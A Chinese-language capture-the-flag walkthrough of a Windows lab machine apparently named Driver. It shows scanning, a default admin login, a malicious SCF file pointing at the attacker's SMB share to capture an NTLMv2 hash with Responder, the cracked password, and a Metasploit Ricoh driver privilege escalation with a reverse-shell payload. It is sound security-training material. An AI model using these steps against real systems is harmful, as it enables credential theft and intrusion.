本文介绍了如何通过对Windows系统进行信息收集、漏洞分析和利用,实现用户权限提升和根权限获取。使用Nmap扫描目标主机,发现开放的端口和服务,并通过上传恶意的SCF文件捕获NTLM哈希。接着,利用破解得到的哈希获取用户权限,并进行特权提升,最终利用Ricoh打印机驱动程序的漏洞获取根权限。文章详细描述了攻击流程和方法,为读者提供了实用的渗透测试技术和经验教训。
Information Gathering
# Nmap 7.98 scan initiated Wed Dec 31 09:16:57 2025 as: /usr/lib/nmap/nmap -sC -sV -v -O -oN nmap_result.txt 10.10.11.106
Nmap scan report for 10.10.11.106
Host is up (0.088s latency).
Not shown: 996 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=MFP Firmware Update Center. Please enter password for admin
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows 7 or Windows Server 2008 R2 (91%), Microsoft Windows 10 1607 (89%), Microsoft Windows Server 2008 R2 (89%), Microsoft Windows 11 (86%), Microsoft Windows 8.1 Update 1 (86%), Microsoft Windows Phone 7.5 or 8.0 (86%), Microsoft Windows Vista or Windows 7 (86%), Microsoft Windows Server 2008 R2 or Windows 7 SP1 (85%), Microsoft Windows Server 2012 R2 (85%), Microsoft Windows Server 2016 (85%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 0.001 days (since Wed Dec 31 09:15:55 2025)
TCP Sequence Prediction: Difficulty=258 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: Host: DRIVER; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2025-12-31T15:47:04
|_ start_date: 2025-12-31T15:45:49
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_clock-skew: mean: 6h29m44s, deviation: 0s, median: 6h29m44s
Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Dec 31 09:17:57 2025 -- 1 IP address (1 host up) scanned in 60.06 secondsVulnerability Analysis
打开http://10.10.11.106/输入admin:admin就进入了,发现可以上传固件。加上smb服务开启
SCF NTLM 哈希捕获
Windows 系统有一个特性:如果一个文件夹里包含一个 .scf (Shell Command File) 文件,并且 Windows 资源管理器(或某种后台服务)尝试查看这个文件夹时,.scf 文件可以指示系统去加载一个“远程图标”。
攻击流程:
- 上传一个恶意的
.scf文件,里面写着“图标请去攻击者的机器上取”。 - 靶机后台服务在处理上传目录时,会尝试连接Kali。
- Windows 在连接 SMB 共享时,会默认发送当前用户的 NTLMv2 哈希 进行身份验证。
- 在 Kali 上用
Responder监听,就能截获这个哈希。 - 拿到哈希后,破解它,获得明文密码。
Exploitation (User Flag)
上传一个恶意的.csf程序,里面包含“图标请去攻击者的机器上取”。
➜ Driver nano @exploit.scf
➜ Driver cat @exploit.scf
[Shell]
Command=2
IconFile=\\10.10.16.3\share\test.ico
[Taskbar]
Command=ToggleDesktop启动监听上传文件
➜ Driver sudo responder -I tun0
[SMB] NTLMv2-SSP Hash : tony::DRIVER:9df54339562d9c7c:9D14D9809E6DB7E0A35B2866A418F660:0101000000000000002E498F377ADC01C085F55086ACD0BF0000000002000800440044004200320001001E00570049004E002D004C004C00320054004C00480056004C004C005800370004003400570049004E002D004C004C00320054004C00480056004C004C00580037002E0044004400420032002E004C004F00430041004C000300140044004400420032002E004C004F00430041004C000500140044004400420032002E004C004F00430041004C0007000800002E498F377ADC010600040002000000080030003000000000000000000000000020000021B774E55D153D08289FB802C0AFD1AB67A81BF61B6A4381AE931D3BBB07E3BE0A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E00310030002E00310036002E003300000000000000000000000000破解密码得到tony:liltony
➜ Driver evil-winrm -i 10.10.11.106 -u tony -p 'liltony'Privilege Escalation (Root Flag)
我们尝试连接到msfconsole
meterpreter > ps
2848 840 taskhostw.exe x64 1 DRIVER\tony C:\Windows\System32\taskhostw.exe
meterpreter > migrate 2848 # migrate 到1的可以交互的地方
[*] Migrating from 5036 to 2848...
[*] Migration completed successfully.
msf exploit(multi/handler) > use multi/recon/local_exploit_suggester
msf post(multi/recon/local_exploit_suggester) > set session 1
run[*] 10.10.11.106 - Valid modules for session 1:
============================
# Name Potentially Vulnerable? Check Result
- ---- ----------------------- ------------
1 exploit/windows/local/bypassuac_comhijack Yes The target appears to be vulnerable.
2 exploit/windows/local/bypassuac_dotnet_profiler Yes The target appears to be vulnerable.
3 exploit/windows/local/bypassuac_eventvwr Yes The target appears to be vulnerable.
4 exploit/windows/local/bypassuac_fodhelper Yes The target appears to be vulnerable.
......鉴于80端口运行的是打印机服务,所以我们可以尝试相关的漏洞
我们查看一下powershell的历史命令
C:\Users\tony\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
PS C:\Users\tony> type C:\Users\tony\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
Add-Printer -PrinterName "RICOH_PCL6" -DriverName 'RICOH PCL6 UniversalDriver V4.23' -PortName 'lpt1:'
ping 1.1.1.1
ping 1.1.1.1所以使用
15 exploit/windows/local/ricoh_driver_privesc Yes The target appears to be vulnerable. Ricoh driver directory has full permissionsmsf exploit(windows/local/ricoh_driver_privesc) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(windows/local/ricoh_driver_privesc) > set session 1
session => 1
msf exploit(windows/local/ricoh_driver_privesc) > set lhost tun0
lhost => 10.10.16.3
msf exploit(windows/local/ricoh_driver_privesc) > run